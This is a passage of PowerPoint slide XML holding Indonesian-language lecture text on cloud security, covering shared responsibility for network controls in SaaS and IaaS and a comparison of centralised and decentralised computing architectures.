            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model SaaS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model IaaS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inti yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukanlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66067589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Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terdesentralisasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada model di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada administrator server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mainframe dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
